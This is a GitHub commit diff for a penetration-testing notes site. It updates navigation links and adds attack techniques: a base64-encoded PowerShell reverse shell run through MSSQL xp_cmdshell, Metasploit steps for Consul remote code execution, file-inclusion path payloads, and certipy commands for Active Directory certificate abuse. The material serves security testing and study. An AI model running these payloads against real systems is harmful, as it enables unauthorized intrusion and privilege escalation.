Skip to content

Commit 6c20c43

Browse files
committed
updated
1 parent acab5e0 commit 6c20c43

File tree

11 files changed

+98
-88
lines changed

11 files changed

+98
-88
lines changed

src/_components/footer.vto

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -39,20 +39,20 @@
3939
{{ site.hermit.name }}
4040
</a>
4141
<a
42-
href="{{ site.ihunt.url }}"
42+
href="{{ site.lolgen.url }}"
4343
target="_blank"
4444
rel="noopener noreferrer"
4545
class="hover:brightness-200"
4646
>
47-
{{ site.ihunt.name }}
47+
{{ site.lolgen.name }}
4848
</a>
4949
<a
50-
href="{{ site.lolgen.url }}"
50+
href="{{ site.exploit_sensei.url }}"
5151
target="_blank"
5252
rel="noopener noreferrer"
5353
class="hover:brightness-200"
5454
>
55-
{{ site.lolgen.name }}
55+
{{ site.exploit_sensei.name }}
5656
</a>
5757
</div>
5858
</div>

src/_components/header.vto

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -71,18 +71,18 @@
7171
{{ site.hermit.name }}
7272
</a>
7373
<a
74-
href="{{ site.ihunt.url }}"
74+
href="{{ site.lolgen.url }}"
7575
target="_blank"
7676
rel="noopener noreferrer"
7777
>
78-
{{ site.ihunt.name }}
78+
{{ site.lolgen.name }}
7979
</a>
8080
<a
81-
href="{{ site.lolgen.url }}"
81+
href="{{ site.exploit_sensei.url }}"
8282
target="_blank"
8383
rel="noopener noreferrer"
8484
>
85-
{{ site.lolgen.name }}
85+
{{ site.exploit_sensei.name }}
8686
</a>
8787
</div>
8888
</div>

src/_components/navigation.vto

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -71,20 +71,20 @@
7171
{{ site.hermit.name }}
7272
</a>
7373
<a
74-
href="{{ site.ihunt.url }}"
74+
href="{{ site.lolgen.url }}"
7575
target="_blank"
7676
rel="noopener noreferrer"
7777
class="text-lg"
7878
>
79-
{{ site.ihunt.name }}
79+
{{ site.lolgen.name }}
8080
</a>
8181
<a
82-
href="{{ site.lolgen.url }}"
82+
href="{{ site.exploit_sensei.url }}"
8383
target="_blank"
8484
rel="noopener noreferrer"
8585
class="text-lg"
8686
>
87-
{{ site.lolgen.name }}
87+
{{ site.exploit_sensei.name }}
8888
</a>
8989
</div>
9090
</div>

src/_data/site.yml

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -21,11 +21,11 @@ hermit:
2121
name: Hermit C2
2222
url: https://github.com/hideckies/hermit
2323
desc: A command and control framework.
24-
ihunt:
25-
name: ihunt
26-
url: https://github.com/hideckies/ihunt
27-
desc: Information gathering tool.
2824
lolgen:
2925
name: LOLGEN
3026
url: https://lolgen.hdks.org/
3127
desc: Living Off The Land Payload Generator.
28+
exploit_sensei:
29+
name: Exploit Sensei
30+
url: https://github.com/hideckies/exploit-sensei
31+
desc: LLM-powered Exploitation Recommendation Tool.

src/exploit/database/mssql-pentesting.md

Lines changed: 7 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@ tags:
77
refs:
88
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
99
- https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16
10-
date: 2024-10-13
10+
date: 2025-03-15
1111
draft: false
1212
---
1313

@@ -133,13 +133,12 @@ EXEC xp_cmdshell 'whoami'
133133

134134
## Spawn a Windows Command Shell and Run Commands using Impacket
135135

136-
If we connected MSSQL using **impacket**, we can exeucte the Windows Shell Commands by **"enable_xp_cmdshell"**.
136+
In MSSQL client, we can exeucte the Windows Shell Commands by `enable_xp_cmdshell` if the user has the permission.
137137

138138
### Enable/Disable a Windows Shell
139139

140140
```powershell
141141
> enable_xp_cmdshell
142-
> disable_xp_cmdshell
143142
144143
# or
145144
@@ -161,8 +160,12 @@ We can execute commands the same as Windows Command Prompt.
161160
```powershell
162161
> xp_cmdshell whoami
163162
164-
# Execute obfuscated commands.
163+
# Execute obfuscated PowerShel commands.
165164
> xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'
165+
166+
# Reverse Shell
167+
# Note: Replace the Base64 encoded payload with your own. See details: https://exploit-notes.hdks.org/exploit/shell/reverse-shell-cheat-sheet/#powershell
168+
> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMAAuADAALgAxACcALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
166169
```
167170

168171
<br />

src/exploit/dns/index.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ tags:
55
- Privilege Escalation
66
- Reconnaissance
77
refs:
8-
date: 2024-08-11
8+
date: 2025-03-15
99
draft: false
1010
---
1111

@@ -49,7 +49,7 @@ dnsenum --dnsserver <target-ip> --enum -p 0 -s 0 -f wordlist.txt example.com
4949

5050
```sh
5151
# ANY (all) record
52-
did example.com ANY
52+
dig example.com ANY
5353
dig example.com @<dns-ip> ANY
5454
dig example.com +nocmd +noall +answer ANY
5555

src/exploit/web/hashicorp-consul-pentesting.md

Lines changed: 26 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,10 +5,35 @@ tags:
55
- Privilege Escalation
66
- Web
77
refs:
8-
date: 2022-12-10
8+
date: 2025-03-15
99
draft: false
1010
---
1111

12+
## Interesting Files in Target System
13+
14+
If we are in the target system, we can investigate the following files:
15+
16+
```bash
17+
cat /etc/consul.d/config.json
18+
```
19+
20+
## RCE
21+
22+
Resource: [Pentester Academy Blog](https://blog.pentesteracademy.com/hashicorp-consul-remote-command-execution-via-services-api-d709f8ac3960)
23+
24+
Using Metasploit, we may be able to execute command and get a reverse shell. Run the following commands in your local machine.
25+
26+
```bash
27+
msfconsole
28+
msf> use exploit/multi/misc/consul_service_exec
29+
msf> set rhosts <target-ip>
30+
msf> set lhost <your-ip>
31+
msf> run
32+
# Session created...
33+
msf> shell # Spawn the shell
34+
whoami # Run command in the target system
35+
```
36+
1237
## Privilege Escalation
1338

1439
If you have the ACL token (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx), you may be able to privilege escalation.

src/exploit/web/security-risk/file-inclusion.md

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ tags:
55
- Web
66
refs:
77
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
8-
date: 2025-01-30
8+
date: 2025-03-15
99
draft: false
1010
---
1111

@@ -161,6 +161,8 @@ When our payload is successful, we can additionaly investigate local files and r
161161
?page=/var/www/sudomain/index.php
162162
?page=/var/www/subdomain.example.com/index.php
163163
?page=/var/www/wordpress/index.php
164+
?page=/home/<username>/app/index.html
165+
?page=/home/<username>/webapp/index.html
164166

165167
# Apache
166168
?page=/etc/apache2/.htpasswd

src/exploit/windows/active-directory/shadow-credentials.md

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,7 @@ tags:
77
- Windows
88
refs:
99
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
10-
date: 2025-03-13
10+
date: 2025-03-15
1111
draft: false
1212
---
1313

@@ -24,8 +24,11 @@ certipy shadow auto -u <user>@<target-ip> -hashes <nt-hash-of-user> -account <ta
2424
# 2. Update the target account's UPN (User Principal Name) to "administrator"
2525
certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> -user <target-user> -upn administrator
2626

27+
# (Option) Find vulnerable template (check values for 'Template Name' and 'Certificate Authorities'. They will be used for the later commands)
28+
certipy find -u <ca>@<target-ip> -hashes <nthash-of-ca> -stdout -vulnerable
29+
2730
# 3. Request a certificate for the target account using a vulnerable CA template
28-
certipy req -username <target-user>@<target-ip> -hashes <nt-hash-of-target-user> ca <ca> template <template>
31+
certipy req -u <target-user>@<target-ip> -hashes <nt-hash-of-target-user> -ca <ca> -template <template>
2932

3033
# 4. Restore the target account's UPN to its original value
3134
certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> user <target-user> -upn <target-user>@<target-ip>

src/exploit/windows/powershell/powerview.md

Lines changed: 0 additions & 54 deletions
This file was deleted.

0 commit comments

Comments
 (0)